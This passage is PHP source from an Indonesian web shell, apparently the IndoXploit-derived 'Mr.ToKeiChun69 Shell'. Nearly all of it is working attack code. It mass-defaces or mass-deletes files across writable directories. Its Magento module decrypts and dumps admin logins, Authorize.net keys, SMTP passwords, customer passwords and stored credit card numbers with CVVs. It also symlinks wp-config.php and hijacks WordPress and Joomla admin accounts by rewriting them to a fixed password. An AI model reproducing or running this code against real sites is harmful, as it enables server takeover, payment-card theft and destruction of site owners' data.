  745. if(is_writable($dir)) {
  746. $dira = scandir($dir);
  747. foreach($dira as $dirb) {
  748. $dirc = "$dir/$dirb";
  749. $lokasi = $dirc.'/'.$namafile;
  750. if($dirb === '.') {
  751. file_put_contents($lokasi, $isi_script);
  752. } elseif($dirb === '..') {
  753. file_put_contents($lokasi, $isi_script);
  754. } else {
  755. if(is_dir($dirc)) {
  756. if(is_writable($dirc)) {
  757. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  758. file_put_contents($lokasi, $isi_script);
  759. $idx = sabun_massal($dirc,$namafile,$isi_script);
  760. }
  761. }
  762. }
  763. }
  764. }
  765. }
  766. if($_POST['mass'] == 'onedir') {
  767. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  768. $ini="http://";
  769. $mainpath=$_POST[d_dir];
  770. $file=$_POST[d_file];
  771. $dir=opendir("$mainpath");
  772. $code=base64_encode($_POST[script]);
  773. $indx=base64_decode($code);
  774. while($row=readdir($dir)){
  775. $start=@fopen("$row/$file","w+");
  776. $finish=@fwrite($start,$indx);
  777. if ($finish){
  778. echo"$ini$row/$file\n";
  779. }
  780. }
  781. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  782. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  783. $dir=opendir("$mainpath");
  784. $code=base64_encode($_POST[script]);
  785. $indx=base64_decode($code);
  786. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  787. $finish=@fwrite($start,$indx);
  788. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  789. }
  790.  
  791. }
  792. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  793. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  794. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  795. elseif($_POST['mass'] == 'massdeface') {
  796. echo "<div style='margin: 5px auto; padding: 5px'>";
  797. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  798. echo "</div>"; }
  799. else {
  800. echo "
  801. <center><font style='text-decoration: underline;'>
  802. Select Type:<br>
  803. </font>
  804. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  805. <option value=\"onedir\">Mass Deface 1 Dir</option>
  806. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  807. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  808. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  809. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  810. <font style='text-decoration: underline;'>Folder:</font><br>
  811. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  812. <font style='text-decoration: underline;'>Filename:</font><br>
  813. <input type='text' name='d_file' value='readthis.html' style='width: 450px;' height='10'><br>
  814. <font style='text-decoration: underline;'>Index File:</font><br>
  815. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  816. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  817. </form></center>";
  818. }
  819. }
  820. elseif($_GET['do'] == 'magen') {
  821. echo'
  822. <div id="page-wrap">
  823. <center>
  824. <br>
  825. <FORM action="" method="post">
  826. <div align="center">[M A G E N T O] - Stealing Information<br>
  827. <div align="center">coder: sohai & n4KuLa_<br>
  828. <input type="hidden" name="form_action" value="2">
  829. </div>
  830. </div>
  831. ';
  832.  
  833.  
  834. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  835. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  836. if(isset($xml->global->resources->default_setup->connection)) {
  837. $connection = $xml->global->resources->default_setup->connection;
  838. $prefix = $xml->global->resources->db->table_prefix;
  839. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  840. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  841.  
  842. try {
  843. $app = Mage::app('default');
  844. Mage::getSingleton('core/session', array('name'=>'frontend'));
  845. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  846.  
  847. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  848. print("Could not connect: " . mysql_error());
  849. }
  850. mysql_select_db($connection->dbname);
  851. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  852.  
  853. $crypto = new Varien_Crypt_Mcrypt();
  854. $crypto->init($key);
  855.  
  856. //=========================================================================================================
  857. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  858. if (!$query){
  859. echo "<center><b>Gagal</b></center>";
  860. }else{
  861. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  862. echo'<br><br>
  863. ====================================================================<br>
  864. [ Admin FROM website : '.$site['website'].'] <br>
  865. ====================================================================<br>';
  866. }
  867. echo "
  868. <table border='1' align='center' >
  869. <tr>
  870. <td>id</td>
  871. <td>firstname</td>
  872. <td>lastname</td>
  873. <td>email</td>
  874. <td>username</td>
  875. <td>password</td>
  876. </tr>";
  877. while($vx = mysql_fetch_array($query)) {
  878. $no = 1;
  879. $user_id = $vx['user_id'];
  880. $username = $vx['username'];
  881. $password = $vx['password'];
  882. $email = $vx['email'];
  883. $firstname = $vx['firstname'];
  884. $lastname = $vx['lastname'];
  885. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  886. }
  887. echo "</table><br>";
  888. //=========================================================================================================
  889. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  890. if(mysql_num_rows($query) != 0){
  891. if (!$query){
  892. echo "<center><b>Gagal</b></center>";
  893. }else{
  894. echo'<br><br>
  895. ====================================================================<br>
  896. [ Authorizenet ] <br>
  897. ====================================================================<br>';
  898. }
  899. echo "
  900. <table border='1' align='center' >
  901. <tr>
  902. <td>no</td>
  903. <td>user</td>
  904. <td>pass</td>
  905. </tr>";
  906. $no = 1;
  907. while($vx = mysql_fetch_array($query)) {
  908. $user = $crypto->decrypt($vx['user']);
  909. $pass = $crypto->decrypt($vx['pass']);
  910.  
  911.  
  912. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  913. $no++;
  914. }
  915. echo "</table><br>";
  916. }
  917. //=========================================================================================================
  918. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  919. if(mysql_num_rows($query_smtp) != 0){
  920. if (!$query_smtp){
  921. echo "<center><b>Gagal</b></center>";
  922. }else{
  923. echo'<br><br>
  924. ====================================================================<br>
  925. [ SMTP ] <br>
  926. ====================================================================<br>';
  927. }
  928. echo "
  929. <table border='1' align='center' >
  930. <tr>
  931. <td>no</td>
  932. <td>host</td>
  933. <td>port</td>
  934. <td>user</td>
  935. <td>pass</td>
  936. </tr>";
  937. $no = 1;
  938. $batas = 0;
  939. while($rows = mysql_fetch_array($query_smtp)) {
  940. $smtphost = $rows[0];
  941. $smtpport = $rows[1];
  942. $smtpuser = $rows[2];
  943. $smtppass = $rows[3];
  944. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  945. $no++;
  946. }
  947. echo "</table><br>";
  948. }
  949. //=========================================================================================================
  950. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  951. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  952. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  953. echo'<br><br>
  954. ====================================================================<br>
  955. [ Credit Card ] <br>
  956. ====================================================================<br>';
  957. echo "
  958. <table border='1' align='left' >
  959. <tr>
  960. <td>no</td>
  961. <td>Date</td>
  962. <td>Credit Owner</td>
  963. <td>method</td>
  964. <td>Credit Number</td>
  965. <td>Credit Exp</td>
  966. <td>CVV</td>
  967. <td>Address</td>
  968. </tr>";
  969. $no = 1;
  970. $batas = 0;
  971. while($vx = mysql_fetch_array($query)){
  972. $date = $vx['updated_at'];
  973. $cc_owner = $vx['cc_owner'];
  974. $method = $vx['method'];
  975. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  976. $exp = $vx['exp'];
  977. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  978. $Billing_Address = $vx['Billing Address'];
  979. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  980. $batas = $no++;
  981. }
  982.  
  983. while($vx2 = mysql_fetch_array($query2)){
  984. $batas +=1;
  985. $cc_owner = $vx2['cc_owner'];
  986. $method = $vx2['method'];
  987. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  988. $exp = $vx2['exp'];
  989. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  990. $Billing_Address = $vx2['Billing Address'];
  991. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  992. $batas++;
  993. }
  994.  
  995. echo "</table><br>";
  996. }
  997. //=========================================================================================================
  998. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  999. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  1000.  
  1001.  
  1002. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  1003. if (!$query){
  1004. echo "<center><b>Gagal</b></center>";
  1005. }else{
  1006. echo'<br><br>
  1007. ====================================================================<br>
  1008. [ Customer ] <br>
  1009. ====================================================================<br>';
  1010. }
  1011. echo "
  1012. <table border='1' align='center' >
  1013. <tr>
  1014. <td>no</td>
  1015. <td>user</td>
  1016. <td>pass</td>
  1017. </tr>";
  1018. $no = 1;
  1019. $batas = 0;
  1020. while($vx = mysql_fetch_array($query)) {
  1021. $user = $vx['email'];
  1022. $pass = $vx['value'];
  1023. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  1024. $batas = $no++;
  1025. }
  1026.  
  1027. if(mysql_num_rows($query2) != 0 && ($query2)){
  1028. while($vx2 = mysql_fetch_array($query2)){
  1029. $user = $vx2['customer_email'];
  1030. $pass = $crypto->decrypt($vx2['password_hash']);
  1031. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  1032. $batas +=1;
  1033. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  1034. $batas++;
  1035. }
  1036. }
  1037. }
  1038.  
  1039. echo "</table><br>";
  1040. }
  1041. //=========================================================================================================
  1042. }
  1043. }
  1044. function save($format,$data){
  1045. $fp = fopen($format, 'a');
  1046. fwrite($fp, $data);
  1047. fclose($fp);
  1048. }
  1049. function cekbase64($string){
  1050. $decoded = base64_decode($string, true);
  1051. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  1052. if(!base64_decode($string, true)) return false;
  1053. if(base64_encode($decoded) != $string) return false;
  1054. return true;//nilai return 1 jika true
  1055. }
  1056. //----untuk decode password ---/
  1057. class Varien_Crypt_Mcrypt{
  1058. /**
  1059. * Constuctor
  1060. *
  1061. * @param array $data
  1062. */
  1063. public function __construct()
  1064. {
  1065. }
  1066.  
  1067. /**
  1068. * Initialize mcrypt module
  1069. *
  1070. * @param string $key cipher private key
  1071. * @return Varien_Crypt_Mcrypt
  1072. */
  1073. public function init($key)
  1074. {
  1075. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  1076. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  1077. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  1078.  
  1079. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  1080. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  1081. return null;
  1082. }
  1083.  
  1084. mcrypt_generic_init($this->handler, $key, $iv);
  1085.  
  1086. return $this;
  1087. }
  1088.  
  1089. /**
  1090. * Encrypt data
  1091. *
  1092. * @param string $data source string
  1093. * @return string
  1094. */
  1095. public function encrypt($data)
  1096. {
  1097. if (!$this->handler) {
  1098. //throw new Varien_Exception('Crypt module is not initialized.');
  1099. return null;
  1100. }
  1101. if (strlen($data) == 0) {
  1102. return $data;
  1103. }
  1104. return base64_encode(mcrypt_generic($this->handler, $data));
  1105. }
  1106.  
  1107. /**
  1108. * Decrypt data
  1109. *
  1110. * @param string $data encrypted string
  1111. * @return string
  1112. */
  1113. public function decrypt($data)
  1114. {
  1115. if (!$this->handler) {
  1116. //throw new Varien_Exception('Crypt module is not initialized.');
  1117. return null;
  1118. }
  1119. if (strlen($data) == 0) {
  1120. return $data;
  1121. }
  1122. return mdecrypt_generic($this->handler, base64_decode($data));
  1123. }
  1124.  
  1125.  
  1126. /**
  1127. * Desctruct cipher module
  1128. *
  1129. */
  1130. public function __destruct()
  1131. {
  1132. if ($this->handler) {
  1133. $this->_reset();
  1134. }
  1135. }
  1136.  
  1137. protected function _reset()
  1138. {
  1139. mcrypt_generic_deinit($this->handler);
  1140. mcrypt_module_close($this->handler);
  1141. }
  1142. }
  1143. }
  1144. elseif($_GET['do'] == 'zip') {
  1145. echo "<center><h1>Zip Menu</h1>";
  1146. function rmdir_recursive($dir) {
  1147. foreach(scandir($dir) as $file) {
  1148. if ('.' === $file || '..' === $file) continue;
  1149. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1150. else unlink("$dir/$file");
  1151. }
  1152. rmdir($dir);
  1153. }
  1154. if($_FILES["zip_file"]["name"]) {
  1155. $filename = $_FILES["zip_file"]["name"];
  1156. $source = $_FILES["zip_file"]["tmp_name"];
  1157. $type = $_FILES["zip_file"]["type"];
  1158. $name = explode(".", $filename);
  1159. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1160. foreach($accepted_types as $mime_type) {
  1161. if($mime_type == $type) {
  1162. $okay = true;
  1163. break;
  1164. }
  1165. }
  1166. $continue = strtolower($name[1]) == 'zip' ? true : false;
  1167. if(!$continue) {
  1168. $message = "Itu Bukan Zip , , GOBLOK COK";
  1169. }
  1170. $path = dirname(__FILE__).'/';
  1171. $filenoext = basename ($filename, '.zip');
  1172. $filenoext = basename ($filenoext, '.ZIP');
  1173. $targetdir = $path . $filenoext;
  1174. $targetzip = $path . $filename;
  1175. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  1176. mkdir($targetdir, 0777);
  1177. if(move_uploaded_file($source, $targetzip)) {
  1178. $zip = new ZipArchive();
  1179. $x = $zip->open($targetzip);
  1180. if ($x === true) {
  1181. $zip->extractTo($targetdir);
  1182. $zip->close();
  1183.  
  1184. unlink($targetzip);
  1185. }
  1186. $message = "<b>Sukses Gan :)</b>";
  1187. } else {
  1188. $message = "<b>Error Gan :(</b>";
  1189. }
  1190. }
  1191. echo '<table style="width:100%" border="1">
  1192. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1193. <label>Zip File : <input type="file" name="zip_file" /></label>
  1194. <input type="submit" name="submit" value="Upload And Unzip" />
  1195. </form>';
  1196. if($message) echo "<p>$message</p>";
  1197. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1198. if($_POST['backup']){
  1199. $save=$_POST['save'];
  1200. function Zip($source, $destination)
  1201. {
  1202. if (extension_loaded('zip') === true)
  1203. {
  1204. if (file_exists($source) === true)
  1205. {
  1206. $zip = new ZipArchive();
  1207.  
  1208. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1209. {
  1210. $source = realpath($source);
  1211.  
  1212. if (is_dir($source) === true)
  1213. {
  1214. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1215.  
  1216. foreach ($files as $file)
  1217. {
  1218. $file = realpath($file);
  1219.  
  1220. if (is_dir($file) === true)
  1221. {
  1222. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1223. }
  1224.  
  1225. else if (is_file($file) === true)
  1226. {
  1227. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1228. }
  1229. }
  1230. }
  1231.  
  1232. else if (is_file($source) === true)
  1233. {
  1234. $zip->addFromString(basename($source), file_get_contents($source));
  1235. }
  1236. }
  1237.  
  1238. return $zip->close();
  1239. }
  1240. }
  1241.  
  1242. return false;
  1243. }
  1244. Zip($_POST['dir'],$save);
  1245. echo "Done , Save To <b>$save</b>";
  1246. }
  1247. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1248. if($_POST['extrak']){
  1249. $save=$_POST['save'];
  1250. $zip = new ZipArchive;
  1251. $res = $zip->open($_POST['dir']);
  1252. if ($res === TRUE) {
  1253. $zip->extractTo($save);
  1254. $zip->close();
  1255. echo 'Succes , Location : <b>'.$save.'</b>';
  1256. } else {
  1257. echo 'Gagal Mas :( Ntahlah !';
  1258. }
  1259. }
  1260. echo '</tr></table>';
  1261. } elseif($_GET['do'] == 'loghunter')
  1262. {
  1263. echo '<center><h2>Log Hunter</h2></center>';
  1264. echo "<Center>\n";
  1265. echo "<form action=\"\" method=\"post\">\n";
  1266. ?><br>Dir :<input type="text" value="<?=getcwd();?>" name="shc_dir"><?php
  1267. echo "<input type=\"submit\" name=\"submit\" class=\"kotak\" value=\"Scan Now!\"/>\n";
  1268. echo "</form>\n";
  1269. echo "<pre style=\"text-align: left;\">\n";
  1270. error_reporting(0);
  1271. /*
  1272. Name : Log Hunter (Grab Email)
  1273. Date : 26/03/2016 05:53 PM
  1274. Link : http://facebook.com/bug7sec
  1275. Link : http://pastebin.com/u/shor7cut
  1276. Author : Shor7cut
  1277. */
  1278.  
  1279.  
  1280. if($_POST['submit']){
  1281. function tampilkan($shcdirs){
  1282. foreach(scandir($shcdirs) as $shc)
  1283. {
  1284. if($shc!='.' && $shc!='..')
  1285. {
  1286. $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  1287. if( !is_dir($shc) && !eregi("css", $shc) ){
  1288.  
  1289. $fgt = file_get_contents($shc);
  1290. $ifgt = exif_read_data($shc);
  1291. $jembut = "COMPUTED";
  1292. $taik = "UserComment";
  1293. $shcm = "/mail['(']/";
  1294. if($ifgt[$jembut][$taik]){
  1295. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  1296. }
  1297. preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  1298. $hcs = "/base64_decode/";
  1299. $exif = "/exif_read_data/";
  1300. preg_match($shcm, addslashes($fgt), $mailshc);
  1301. preg_match($hcs, addslashes($fgt), $shcmar);
  1302. preg_match($exif, addslashes($fgt), $shcxif);
  1303. if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  1304. }
  1305. if(eregi('tmp_name', $fgt)){
  1306. echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  1307. }
  1308. if($shcmar[0]){
  1309. echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  1310. }
  1311. if($mailshc[0]){
  1312. echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  1313. }
  1314. if($shcxif[0]){
  1315. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  1316. }
  1317. if(eregi("js", $shc)){
  1318. echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  1319. }
  1320. if($cocok[0]){
  1321. foreach ($cocok[0] as $key => $shcmail) {
  1322. if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  1323. echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  1324. }
  1325. }
  1326. }
  1327.  
  1328. }else{
  1329. tampilkan($shc);
  1330. }
  1331. }
  1332. }
  1333. }
  1334. tampilkan($_POST['shc_dir']);
  1335. }
  1336. echo "</pre>\n";
  1337. echo "</Center>\n";}
  1338. elseif($_GET['do'] == 'metu') {
  1339.  
  1340.  
  1341. echo '<form action="?dir=$dir&do=metu" method="post">';
  1342. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1343. echo 'Byee !';
  1344.  
  1345. }
  1346. elseif($_GET['do'] == 'about') {
  1347.  
  1348. echo '<center>Mr.ToKeiChun69 Shell<hr>IndoXploit Shell Recoded By Mr.ToKeiChun59<br><a href="https://www.facebook.com/tokeichun.sh">Here</a>';
  1349. }
  1350. elseif($_GET['do'] == 'symlink404') {
  1351. echo "<center>
  1352. <form method='post'>
  1353. <br>File Target: <input type='text' name='dir' size='50' value='/home/user/public_html/wp-config.php'>
  1354. <br>Save As: <input type='text' name='jnck' size='50' value='config404.txt'><br><input name='sym404' type='submit' value='Eksekusi Gan'></form><br>";
  1355. @error_reporting(0);
  1356. @ini_set('display_errors', 0);
  1357. if($_POST['sym404']){
  1358. rmdir("sym404");mkdir("sym404", 0777);
  1359. $dir = $_POST['dir'];
  1360. $jnck = $_POST['jnck'];
  1361. system("ln -s ".$dir." sym404/".$jnck);
  1362. symlink($dir,"sym404/".$jnck);
  1363. $inija = fopen("sym404/.htaccess", "w");
  1364. fwrite($inija,"Options Indexes FollowSymLinks
  1365. DirectoryIndex tokeichun.html
  1366. AddType text/plain .php
  1367. AddHandler text/plain .php
  1368. Satisfy Any
  1369.  
  1370. ReadmeName ".$jnck);
  1371. echo'<a href="sym404/">Succes! >:(</a>';
  1372. }
  1373.  
  1374. }
  1375. elseif($_GET['do'] == 'auto_cu_wp') {
  1376. if($_POST['gass']) {
  1377. echo "<center><h1>WordPress Auto Change User 2</h1>
  1378. <form method='post'>
  1379. Link Config: <br>
  1380. <textarea name='link' style='width: 450px; height:250px;'>";
  1381. UrlLoop($_POST['linkconf'],'wordpress');
  1382. echo"</textarea><br>
  1383. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1384. </form></center>";
  1385. } else {
  1386. echo "<center><h1>WordPress Auto Change User 2</h1>
  1387. <form method='post'>
  1388. Link Config: <br>
  1389. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1390. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1391. </form></center>";
  1392. }
  1393. if($_POST['auto_cu_wp']) {
  1394.  
  1395. function anucurl($sites) {
  1396. $ch = curl_init($sites);
  1397. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1398. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1399. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1400. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1401. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1402. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1403. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1404. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1405. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1406. $data = curl_exec($ch);
  1407. curl_close($ch);
  1408. return $data;
  1409. }
  1410. $link = explode("\r\n", $_POST['link']);
  1411. $user = "root@1337";
  1412. $pass = "root@1337";
  1413. $passx = md5($pass);
  1414. foreach($link as $dir_config) {
  1415. $config = anucurl($dir_config);
  1416. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1417. $dbuser = ambilkata($config,"DB_USER', '","'");
  1418. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1419. $dbname = ambilkata($config,"DB_NAME', '","'");
  1420. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1421. $prefix = $dbprefix."users";
  1422. $option = $dbprefix."options";
  1423. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1424. $db = mysql_select_db($dbname);
  1425. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1426. $result = mysql_fetch_array($q);
  1427. $id = $result[ID];
  1428. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1429. $result2 = mysql_fetch_array($q2);
  1430. $target = $result2[option_value];
  1431. if($target == '') {
  1432. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1433. } else {
  1434. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1435. }
  1436. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1437. if(!$conn OR !$db OR !$update) {
  1438. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1439. mysql_close($conn);
  1440. } else {
  1441. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1442. echo "[+] username: <font color=lime>$user</font><br>";
  1443. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1444.  
  1445. mysql_close($conn);
  1446. }
  1447. }
  1448. }
  1449.  
  1450. }
  1451. elseif($_GET['do'] == 'auto_cu_joomla') {
  1452. if($_POST['gass']) {
  1453. echo "<center><h1>Joomla Auto Change User 2</h1>
  1454. <form method='post'>
  1455. Link Config: <br>
  1456. <textarea name='link' style='width: 450px; height:250px;'>";
  1457. UrlLoop($_POST['linkconf'],'joomla');
  1458. echo"</textarea><br>
  1459. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1460. </form></center>";
  1461. } else {
  1462. echo "<center><h1>Joomla Auto Change User 2</h1>
  1463. <form method='post'>
  1464. Link Config: <br>
  1465. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1466. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1467. </form></center>";
  1468. }
  1469. if($_POST['auto_cu_joomla']) {
  1470.  
  1471. function anucurl($sites) {
  1472. $ch = curl_init($sites);
  1473. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1474. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1475. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1476. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1477. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1478. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1479. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1480. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1481. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1482. $data = curl_exec($ch);
  1483. curl_close($ch);
  1484. return $data;
  1485. }
  1486. $link = explode("\r\n", $_POST['link']);
  1487. $user = "root@1337";
  1488. $pass = "root@1337";
  1489. $passx = md5($pass);
  1490. foreach($link as $dir_config) {
  1491. $config = anucurl($dir_config);
  1492. $dbhost = ambilkata($config,"host = '","'");
  1493. $dbuser = ambilkata($config,"user = '","'");
  1494. $dbpass = ambilkata($config,"password = '","'");
  1495. $dbname = ambilkata($config,"db = '","'");
